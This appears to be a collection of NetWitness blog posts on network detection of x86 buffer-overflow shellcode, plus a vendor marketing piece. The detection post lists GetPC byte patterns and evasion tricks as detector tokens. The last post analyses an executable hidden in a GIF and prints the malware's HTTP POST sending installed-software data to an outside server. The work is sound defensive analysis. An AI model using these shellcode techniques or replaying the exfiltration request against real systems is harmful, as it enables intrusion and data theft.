Network detection of x86 buffer overflow shellcode


Overview

This technique can detect overflow exploits against software running on the x86 platform, meaning it applies to Windows, Unix, and Mac shellcode. It not only works independently of OS, but it also works for finding both stack- and heap-based overflows. Most interestingly, it catches most forms of polymorphic shellcode as well. (Actually, it excels at finding special shellcodes like polymorphic decryption engines, egg hunters, etc.) While this definitely doesn’t work for all shellcode, it works for a lot of it.

The reason this technique applies to any operating system on x86 is simple. Shellcode is typically written in machine code (commonly called assembly, although it’s not actually the same thing), meaning shellcode is written using processor instructions – something independent of the OS it’s running on. Of course, the entire purpose of shellcode is manipulation of the OS, so shellcode is ultimately OS specific (even patch specific), but its basic primitives are independent of the OS.

One classic problem with shellcoding is addressing. Because shellcode is [typically] nefariously injected via exploitation into a process’s memory segment, and program execution is “hijacked” (without the benefit of setting up proper address pointers), the coder doesn’t know where in memory their code will be. The problem is, very little can be accomplished without knowing the logical memory address of parameters within the shellcode.

The simplest way around this issue is use of a CALL instruction. More information is available in the “Intel 64 and IA-32 Architectures Software Developer’s Manual Volume 2A: Instruction Set Reference, A-M” (and 2B: N-Z) located here: http://www.intel.com/products/processor/manuals/.

The CALL is used as a way to branch processor execution to another location in memory. It has the minor benefit of being able to use relative addressing, but it has the major benefit of PUSH’ing procedure linking information on the stack before branching to the target location. This is commonly referred to as Call Stack Setup. When executing a near call, the processor pushes the value of the EIP register (which contains the offset of the instruction following the CALL instruction) on the stack (for use later as a return-instruction pointer). The processor then branches to the address in the current code segment specified by the target operand.

There are several versions of the CALL instruction, but the one we’re interested in for this purpose is opcode 0xE8. This is a near call (near, meaning within the current code segment) using a relative displacement; the case we care about is a negative offset (i.e., a backwards displacement). The instruction is 5 bytes long, with the last four bytes holding the relative offset (a signed displacement relative to the current value of the instruction pointer in the EIP register, which points to the instruction following the CALL). The CS register is not changed on near calls, so the results of these branches can be safely predicted (from a shellcoder’s perspective).

A section of a disassembled binary is shown here with an actual CALL. Notice the instruction is given as an 0xe8 plus a double word (32 bit) displacement pointer.

The CALL is usually needed early in shellcode execution to PUSH the virtual address contained in the IP onto the stack. (This is done because it’s not possible to access the IP directly, so it needs to be put on the stack to utilize parameters within the shellcode). However, the problem with the use of CALLs for call stack setup in buffer overflow shellcode is the CALL is generally located at an offset needing to serve as a return address after other instructions have already been executed. In other words, the CALL is generally located later in the shellcode and the processor executes the instructions sequentially from the start of the shellcode – unless a branching instruction is encountered.

Which is precisely how to solve the problem in shellcode – early in the execution of the shellcode, you simply JMP to the CALL in question, then call back into the shellcode and continue execution.

JMPs are simple instructions and easy to visually identify and dissect. The short form is simply the opcode 0xEB followed by one byte giving the signed number of bytes to jump, counted from the end of the 2-byte JMP instruction.

The example below is taken from an MDaemon Pre Authentication Heap Overflow exploit:

In the first example above (the egghunter shellcode), we see a “\xeb\x21” which means, “Jump 0x21 (or decimal 33) bytes.” When you jump those bytes, you hit the green box, a CALL. The CALL performs the call stack setup, then branches backwards into the shellcode and picks up just after the JMP (because of the negative displacement). The low byte of the displacement is 0xDA and the remaining bytes are 0xFF, so as a two’s-complement value the displacement is 0x100 – 0xDA = 0x26, or 38 bytes backwards. The displacement is counted from the end of the 5-byte CALL, so subtract 5 to get the distance from the start of the CALL: 33 bytes (0x21), exactly what the JMP skipped. That lands us just after the JMP.
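The displacement arithmetic can be checked with a few lines of Python. This is only a sketch: the byte layout is hypothetical, reconstructed from the values quoted in the text (a JMP of 0x21 and a CALL whose displacement ends in 0xDA), and the padding between them is plain NOPs rather than the real egghunter bytes.

```python
import struct

def jmp_short_target(buf: bytes, off: int) -> int:
    """Offset that a short JMP (0xEB rel8) located at `off` branches to."""
    assert buf[off] == 0xEB
    rel8 = struct.unpack_from("<b", buf, off + 1)[0]   # signed 8-bit displacement
    return off + 2 + rel8                              # counted from the next instruction

def call_near_target(buf: bytes, off: int) -> int:
    """Offset that a near relative CALL (0xE8 rel32) located at `off` branches to."""
    assert buf[off] == 0xE8
    rel32 = struct.unpack_from("<i", buf, off + 1)[0]  # signed 32-bit, little-endian
    return off + 5 + rel32                             # counted from the end of the CALL

# Hypothetical layout: JMP +0x21, 0x21 filler bytes, then CALL with displacement 0xFFFFFFDA.
sample = b"\xeb\x21" + b"\x90" * 0x21 + b"\xe8\xda\xff\xff\xff"

call_at = jmp_short_target(sample, 0)        # where the JMP lands
back_to = call_near_target(sample, call_at)  # where the CALL branches back to
print(hex(call_at), back_to)
```

With this layout the JMP lands on the CALL at offset 0x23, and the CALL branches back to offset 2, the first byte after the JMP.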

Simple, yet effective. Even analysis of polymorphic shellcode generators shows this technique applies to almost all of them as well.

To summarize all this rambling, the technique (shown in the FlexParser below) is simply to search for a JMP straight to a NEAR CALL with a short and negative displacement.
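For readers who want to experiment outside the parser engine, the same search can be sketched in Python. The function name and the `max_back` threshold are assumptions made for illustration. Requiring a forward JMP and a displacement whose upper two bytes are 0xFF is one reading of “short and negative”, not a definitive rule.

```python
import struct
from typing import Iterator

def find_jmp_call(data: bytes, max_back: int = 0x10000) -> Iterator[int]:
    """Yield offsets of short JMPs that land on a near CALL branching a short way backwards."""
    for off in range(len(data) - 1):
        if data[off] != 0xEB:                      # short JMP opcode
            continue
        rel8 = struct.unpack_from("<b", data, off + 1)[0]
        call_at = off + 2 + rel8                   # JMP target
        if rel8 <= 0 or call_at + 5 > len(data):   # assumption: only forward JMPs are of interest
            continue
        if data[call_at] != 0xE8:                  # near relative CALL opcode
            continue
        rel32 = struct.unpack_from("<i", data, call_at + 1)[0]
        if -max_back <= rel32 < 0:                 # short, negative displacement
            yield off

# Hypothetical test buffers (NOP padding, not real shellcode).
suspicious = b"\xeb\x21" + b"\x90" * 0x21 + b"\xe8\xda\xff\xff\xff"
benign = b"\xeb\x02\x90\x90\xe8\x10\x00\x00\x00"   # CALL goes forward, so no hit

print(list(find_jmp_call(suspicious)), list(find_jmp_call(benign)))
```

Like the parser, this fires on every 0xEB byte in the stream, so in practice it would be paired with the filtering of benign PE content discussed later.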

Evasion

Call with no offset

Evasion of JMP/CALL detection can be accomplished in a number of ways. The most interesting evasions are techniques used in advanced NOP sled obfuscation leveraging CALLs, which started surfacing around the mid-2000s.

One of the simplest CALL-based NOP substitutions worked as follows:

00000000    E800000000    call 0x5
00000005    58            pop eax

In that example we have a CALL with no offset, which basically translates to “branch to the instruction after this CALL,” in this case an opcode that simply POPs the EIP into the EAX register. (Remember, when the CALL is hit, the processor runs through the call stack setup, meaning the EIP was just PUSHed onto the stack.) From a NOP perspective, this leaves the stack unchanged, but as a method to grab the EIP, this is simple and efficient (although the NULL bytes make it more difficult to use in a wide range of shellcode).

As that byte sequence is very rare in binaries, detecting this is much simpler since we have the benefit of a continuous 6-byte token to watch for. In the case where the EIP is POPed to EAX, the token is simply

0xE8 0x00 0x00 0x00 0x00 0x58

The above pattern should be extended to include all the general purpose POPs, including:

0xE8 0x00 0x00 0x00 0x00 0x58

0xE8 0x00 0x00 0x00 0x00 0x8F

0xE8 0x00 0x00 0x00 0x00 0x0F 0xA1

0xE8 0x00 0x00 0x00 0x00 0x0F 0xA9
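As a rough illustration, the token match can be written as a plain byte search in Python. The names here are hypothetical. Widening 0x58 to the whole 0x58–0x5F range (POP into any 32-bit general-purpose register) is an assumption, and the two-byte forms are the POP FS (0F A1) and POP GS (0F A9) encodings from the Intel instruction reference.

```python
from typing import List

CALL_NEXT = bytes.fromhex("e800000000")            # CALL with a zero displacement

# Assumed token set: POP r32 (0x58-0x5F), POP r/m32 (0x8F), POP FS, POP GS.
POP_TOKENS = [bytes([b]) for b in range(0x58, 0x60)] + [b"\x8f", b"\x0f\xa1", b"\x0f\xa9"]

def find_call_next_pop(data: bytes) -> List[int]:
    """Return offsets where a zero-displacement CALL is immediately followed by a POP."""
    hits = []
    start = data.find(CALL_NEXT)
    while start != -1:
        tail = data[start + 5:start + 7]           # the one or two bytes after the CALL
        if any(tail.startswith(tok) for tok in POP_TOKENS):
            hits.append(start)
        start = data.find(CALL_NEXT, start + 1)
    return hits

print(find_call_next_pop(b"\x90\xe8\x00\x00\x00\x00\x58\x90"))
```

Because the prefix is five fixed bytes, this kind of match avoids the single-byte-token problem that affects the JMP/CALL search.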

Noir’s no JMP/CALL

This next technique was first described by noir@gsu.linux.org.tr  on the vuln-dev mailing list. It works as follows:

00000000    D9EE               fldz

00000002    D97424F4    fnstenv [esp-0xc]

00000006    58                     pop eax

In this case, the technique is to use FNSTENV to get the EIP of the last FPU instruction evaluated, then POP it from the stack. In the example above, the FLDZ FPU instruction is issued, then its EIP is POP’ed. This very cool technique allows for many permutations since any number of floating point instructions can be used.  Several dozen pages in the Intel Developers Instruction Reference A-M (starting around page 430) cover instructions that can be used in place of FLDZ.
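A narrow sketch of how the exact sequence shown above could be spotted is given below. It makes several assumptions: it only looks for the specific FNSTENV [esp-0xc] encoding from the listing, it expects a two-byte x87 instruction (first byte in the escape range 0xD8–0xDF) directly before it, and it expects a POP into a 32-bit register directly after it. Real encoders can vary all three, so treat this as a starting point rather than a complete detector.

```python
from typing import List

FNSTENV_ESP_MINUS_12 = bytes.fromhex("d97424f4")   # fnstenv [esp-0xc], as in the listing

def find_fnstenv_getpc(data: bytes) -> List[int]:
    """Return offsets of an x87 instruction followed by fnstenv [esp-0xc] and POP r32."""
    hits = []
    pos = data.find(FNSTENV_ESP_MINUS_12)
    while pos != -1:
        after = pos + 4
        fpu_before = pos >= 2 and 0xD8 <= data[pos - 2] <= 0xDF   # x87 escape opcode
        pop_after = after < len(data) and 0x58 <= data[after] <= 0x5F
        if fpu_before and pop_after:
            hits.append(pos - 2)                   # start of the FPU instruction
        pos = data.find(FNSTENV_ESP_MINUS_12, pos + 1)
    return hits

print(find_fnstenv_getpc(bytes.fromhex("d9eed97424f458")))   # fldz / fnstenv / pop eax
```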

Gera’s CALL into self

The final one we’ll look at is a crafty method to avoid JMP/CALLs, and works like this:

00000000    E8FFFFFFFF    call 0x4
00000005    C3            ret
00000006    58            pop eax

The interesting thing is the code above does not perform the actions the disassembler has labeled it as doing. In reality, the CALL (E8FFFFFFFF) is calling backwards into itself by a single byte. Therefore, the processor will hit the byte 0xFF (the tail end of the CALL) and interpret that byte as an instruction. In this case, the instruction is an INC/DEC (increment by 1 or decrement by 1). The 0xC3 is actually an operand byte for the interpreted 0xFF instruction, so it’s not a RET (return, normally used for call stack unwinding) in this case: it selects INC and names the EBX register as the operand, so the two bytes together decode as INC EBX! After this step has been taken (nearly the equivalent of a NOP, since only EBX changes), the value on the stack is POP’ed into the EAX register using the 0x58 instruction. The value POPed is the EIP since it was PUSHed onto the stack when the CALL called back into itself.

While this is a very cool technique, it also provides a number of simple tokens to match on, similar to the Call with no offset example.
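To make the overlapping decode concrete, here is a small Python sketch that re-reads the bytes the way the processor does after the CALL branches into its own last byte. The function name is hypothetical, and it handles only the register-direct INC/DEC forms of opcode 0xFF followed by a POP into a 32-bit register, which is an assumption about what a token-based match would cover.

```python
from typing import List, Optional

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

def decode_call_into_self(data: bytes, off: int = 0) -> Optional[List[str]]:
    """Decode what actually executes after E8 FF FF FF FF calls into its final 0xFF byte."""
    if data[off:off + 5] != b"\xe8\xff\xff\xff\xff" or len(data) < off + 7:
        return None
    modrm = data[off + 5]                      # operand byte for the overlapping 0xFF opcode
    mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
    if mod != 3 or reg not in (0, 1):          # register-direct INC (/0) or DEC (/1) only
        return None
    pop = data[off + 6]
    if not 0x58 <= pop <= 0x5F:                # POP r32
        return None
    op = "inc" if reg == 0 else "dec"
    return [f"{op} {REGS[rm]}", f"pop {REGS[pop - 0x58]}"]

print(decode_call_into_self(bytes.fromhex("e8ffffffffc358")))
```

For the listing above this prints `['inc ebx', 'pop eax']`, matching the description of what the processor really runs.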

False positives and benign triggers

In testing of 55 GB of data (network and host based) no false positives were encountered searching for a JMP to short and near negative CALL. However, benign triggers were encountered (meaning the condition was detected, but it was a valid use of the condition). The condition was only detected inside some valid PE files, and because of that fact, they can be filtered using a number of simple and easy techniques depending on the technology used to discover them.

Flex Parser

Currently, the parser engine does not allow for one-byte tokens, so this parser is not functional as-is. (The concept presented here can easily be extended to identifying percent-encoded shellcodes, which is supported since they are represented as multi-byte tokens.) Nonetheless, and more importantly, the technique is annotated here in Flex so the reader can see how simple it is to write FlexParsers to discover a wide array of very complex conditions – such as universal shellcode detection.

<parser name="exploit_x86_shellcode" desc="exploit_x86_shellcode">

<!-- declaration section holds all variables used down
in the <match> section -->
<declaration>

<!-- this parser will output messages to the suspicious risk category -->

<meta format="Text" key="risk.suspicious" name="suspicious"/>

<!-- parser logic will hit on every 0xeb encountered
this is exactly why single-byte tokens are not supported,
but I'll show it here anyways! -->

<token name="jmp" value="&#xeb;"/>

<!-- some numbers we'll use for testing below -->

<number name="num_jmp_offset" scope="session"/>
<number name="num_call_1" scope="session"/>
<number name="num_call_2" scope="session"/>
<number name="num_call_3" scope="session"/>

</declaration>

<!-- enter the below node when the pattern held in "jmp" is found -->

<match name="jmp">

  <!-- read the next byte and store the value in num_jmp_offset -->

  <read length="1" name="num_jmp_offset">

    <!-- move forward by the value stored in num_jmp_offset -->

    <move direction="forward" value="$num_jmp_offset">
      <move direction="forward" value="1">

        <!-- read the next byte, if it is 0xe8 (decimal 232),
        then continue -->

        <read length="1" name="num_call_1">
          <if name="num_call_1" equal="232">

            <!-- skip low-order address byte -->

            <move direction="forward" value="1">

              <!-- check that the next bytes are 0xff (decimal 255),
              meaning we're not going far in this code -->

              <read length="1" name="num_call_2">
                <if name="num_call_2" equal="255">
                  <read length="1" name="num_call_3">
                    <if name="num_call_3" equal="255">

                      <!-- if we get here, add the tag "exploit_x86_shellcode"
                      to the suspicious category for this session -->

                      <register name="suspicious" value="exploit_x86_shellcode"/>

                    </if>
                  </read>
                </if>
              </read>
            </move>
          </if>
        </read>
      </move>
    </move>
  </read>
</match>
</parser>

A Bucket of Sand?


Did NetWitness actually release a new product that consists of a bucket filled with sand? The answer is yes, but the real question is why? We released B.O.S. in an attempt to sound the wake-up call…

Organizations can no longer afford to rely so heavily on perimeter based technologies, on signatures for identification of threats – and they cannot hide their heads in the sand and hope that nothing goes wrong.  Every day, things are going incredibly wrong.   Prevention alone is an epically failing strategy.

2009 can easily be called the year of advanced threats. The scary thing is that the same can be said for every year over the last five. Despite all efforts, attacks and data losses are getting progressively worse, not better.  During the past five years there have been thousands of breaches reported - impacting state and local government, small and medium sized businesses, multi-national organizations and some of the most sensitive branches of the U.S. Government.   No one is immune and the sickness is literally life threatening.

Imagine for a moment how many breaches went unreported…imagine how many have gone completely undetected.  This is a frightening reality highlighted by the 2009 Verizon Business Data Breach report which found that 49% of breaches went undiscovered for a period of months…and 70% of breaches went completely undetected by internal teams. How is this possible?

The answer is both simple and frightening – the technologies on which organizations have come to rely  aren’t able to prevent, detect, and combat the advanced threats of 2010.

Today’s security technologies are better suited for fighting the cyber-war of 1995 than they are for dealing with today’s advanced threats. The cyber-criminal underground and nation-sponsored groups are using teamwork, custom-developed malware, third-party vulnerabilities via exploit kits, and code obfuscation to bypass existing security technologies and perceptions of security derived from compliance efforts. Because of the industry’s overreliance on signature based technologies, security managers are under the false assumption that they are protected. Too much faith has been placed in firewalls, IDS/IPS, anti-virus, anti-spam and other perimeter platforms to catch the threats.  The current cyber war footing is analogous to bringing a knife to a gun battle – security leaders are reliant upon technologies designed to fight the cyber-war of 10 years ago…our adversaries are fighting with weapons of today.

So, what can be done?

In today’s threat environment it is vitally important that all organizations develop an effective, real-time capability to detect, analyze and respond rapidly to advanced threats. During the last three years, many of the top security teams in the government and commercial sectors have turned to the advanced threat intelligence and real-time network forensics provided by NetWitness NextGen. The only way to truly know what is going on within the network is to look at everything that is going on within the network. Full packet capture and session recreation are the only ways to accomplish this end. Where NetWitness NextGen is deployed, the result is an effective threat intelligence program and continuous augmented awareness that provides in-depth visibility into network events that escape existing network security monitoring tools.

In 2010, you should not be buying a bucket of sand.  To combat the advanced threats we now face, organizations must:

1) Reject “status quo” and compliance-focused thinking and acknowledge that prevention is a failing strategy when facing advanced threats;

2) Focus on real-time detection and rapid investigation of advanced attacks to shorten the risk exposure window of any incident;

3) Build an internal security team that is tailored for advanced threat detection and that is armed with an enterprise-wide, real-time, network forensics capability to achieve optimal network visibility…

In short…when looking to combat advanced threats, organizations should be using NetWitness NextGen.

The Power of Realtime Network Forensics – Advanced Malware Detection


Hey gang…Alex here…writing from the NetWitness Labs…

At NetWitness, our focus is on providing analytics, and we are constantly looking at new ways to apply our unique analytics to the realm of content development.  We know that we have really cool technology and want to showcase that as well as push the envelope of what is possible in this space.   If you’ve seen the recent rule update on the freeware welcome page you are seeing the results of these efforts first hand.

If you’ve been following the threat landscape for the past few years, you will know without question that malware is a key part of both cybercriminal and nation-state hacking activity. You also know that current security technologies are woefully inadequate in detecting targeted and obfuscated malware. Keeping a network secure requires knowledge of normalcy on your network as well as cutting-edge technology to quickly make you aware of deviations from this normalcy.

Part of this concept is using knowledge of what’s “normal” to define what’s “abnormal”. In this example I’ll use Windows executables. We know from common IT knowledge that Windows executables often end with an “.exe” extension (among others). Those with a forensic background also know that Windows executables are forensically identifiable by looking for a file signature that includes common “tells”. An example of this is the PE file header, commonly referred to as “MZ” after the two magic bytes at the very start of the file.

If I take these existing bits of knowledge and combine them, I have the basis for a detection of “abnormal” executables as follows:

“If forensic signature equals windows executable,  but the file extension doesn’t equal a known executable extension, let me know about it!”
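Expressed in Python, the rule might look like the sketch below. It is not the NetWitness parser: the function names and the extension list are assumptions made for illustration, and the signature check uses only the standard PE layout (“MZ” at offset 0, and a 4-byte little-endian pointer at offset 0x3C to the “PE\0\0” signature).

```python
import os
import struct

# Assumed list of "known executable" extensions; adjust to local policy.
EXECUTABLE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl"}

def looks_like_pe(data: bytes) -> bool:
    """True if the buffer starts with an MZ header that points to a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]   # offset of the PE header
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def is_abnormal_executable(filename: str, data: bytes) -> bool:
    """Forensic signature says Windows executable, but the extension says otherwise."""
    ext = os.path.splitext(filename)[1].lower()
    return looks_like_pe(data) and ext not in EXECUTABLE_EXTENSIONS
```

Calling `is_abnormal_executable("photo.jpg", payload)` on a transferred file would return True only when the content is a PE image and the name is not one of the listed executable extensions.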

With this concept in mind, one of my extremely talented coworkers (Gary Golomb) put together a flex parser with the sole purpose of detecting file signatures on the wire. Think of a forensic analysis of file types using a dedicated host forensic tool like EnCase or Forensic Toolkit, but on the network and in real-time. We’ve been testing this parser in various scenarios as warranted, and recently made an interesting discovery while at a client site.

During this engagement, we began investigating hits on our “file signature windows executable” parser, which is designed to generate “alert” metadata in the NetWitness framework when it detects forensic executable tells.

Alert Rule Hit!

Meet 343njpl.jpg:

One of the files that triggered this alert was the following file, which was downloaded from the “tinypic.com” file hosting service and was named 343njpl.jpg:

Hidden File

When I look at this file forensically,  I see an interesting inconsistency.   The file header identifies the file as a GIF, not a JPG.  Something is amiss!

Not a JPG at all!

Digging further…I see that there is, in fact, an executable file header buried in the file:

Exe Header

What’s interesting to note here, is that this file renders as a GIF correctly in a web browser, so if you were to wander across it during an investigation, it would not be readily apparent that it is hiding an executable.

With this new knowledge, we then submitted the file to VirusTotal to determine whether it is known to be malicious. The results were not promising, with 3 detections out of 41:

http://www.virustotal.com/analisis/073a4210835e026712e5aa08e18004eabe9c8c4dc7b4565db47a34e38b565b8b-1258144380

At this point we really wanted to dig deeper and figure out what this file is trying to do, so we opened the file in a hex editor and carved the EXE out of the file, then resubmitted to VirusTotal…results were much better this time, but still only about 66%, with 27 out of 41 detections.
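The carving step was done by hand in a hex editor, but the idea can be sketched in Python. Everything here is an assumption for illustration: the function names are hypothetical, candidates are found by scanning for “MZ” past offset 0 and confirming that the header points to a “PE\0\0” signature, and the carve simply takes everything from that offset to the end of the file.

```python
import struct
from typing import List

def find_embedded_pe(data: bytes) -> List[int]:
    """Return offsets (past the start of the file) that look like an embedded PE image."""
    offsets = []
    pos = data.find(b"MZ", 1)                  # skip offset 0: we want executables hidden inside
    while pos != -1:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            sig = pos + e_lfanew               # PE signature is relative to the MZ header
            if data[sig:sig + 4] == b"PE\x00\x00":
                offsets.append(pos)
        pos = data.find(b"MZ", pos + 1)
    return offsets

def carve(data: bytes, offset: int) -> bytes:
    """Naive carve: everything from the MZ header to the end of the container file."""
    return data[offset:]
```

A stricter carve would parse the PE section table to find the true end of the image, which matters if anything is appended after the executable.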

http://www.virustotal.com/analisis/0ccfe86dc2ab9cd8b9f589bae6666c903af8de2ee2bfcce4dc8464346b4e761a-1256743615

Ok…so we know that this file is indeed malicious now. So what does it actually do? If we use some malware analysis techniques, we discover that it initially reports installed applications to a web server in the Netherlands:

POST /65/logpl.php HTTP/1.1
Referer: http://google.com/
Content-Type: application/x-www-form-urlencoded
User-Agent: hello
Host: www2.sexown.com
Content-Length: 692
Cache-Control: no-cache

pl=plV:1.1|Adobe_Flash_Player_10_ActiveXV:10.0.22.87|Explorer_Suite_III|IDA_Pro_D
emo_v5.4|InstallWatch_Pro_2.5|Malcode_Analyst_Pack_v0.21|Microsoft_.NET_Framework
_3.5_SP1|Mozilla_Firefox_(3.5)V:3.5 (en-US)|Notepad++V:5.4.4|Paros_3.2.13|Windows
_XP_Service_Pack_3V:20080414.031525|WinPcap_4.1_beta5V:4.1.0.1452|Wireshark_1.2.0
V:1.2.0|Mandiant_Red_CurtainV:1.0.0|Python_2.6.2V:2.6.2150|Java(TM)_6_Update_14V:
6.0.140|WebFldrs_XPV:9.50.7523|Mandiant_Web_HistorianV:1.3.0|Mandiant_Highlighter
V:1.1.1|MemoryzeV:1.3.1000|Microsoft_.NET_Framework_3.0_Service_Pack_2V:3.2.30729
|Microsoft_.NET_Framework_2.0_Service_Pack_2V:2.2.30729|Microsoft_.NET_Framework_
3.5_SP1V:3.5.30729|VMware_ToolsV:7.9.6.5197|

So let’s review the facts:

- A file that strays from the expected norm is detected by NetWitness technology, being served from a common file hosting site.

- This file properly renders as a GIF in a web browser, but contains an embedded executable.

- Malware detection on this sample in its embedded form is dismal, but gets better when the executable is extracted from the GIF.

- Using behavioral analysis, we can determine that the attached executable is an information stealer, at the very least.

Tied to an alerting mechanism in NetWitness Informer, we could have this alert sent directly to an enterprise SOC for response, informing them of unusual executable behavior, without having to rely on signature-based malware controls!

NetWitness….letting you see your network like never before.   :)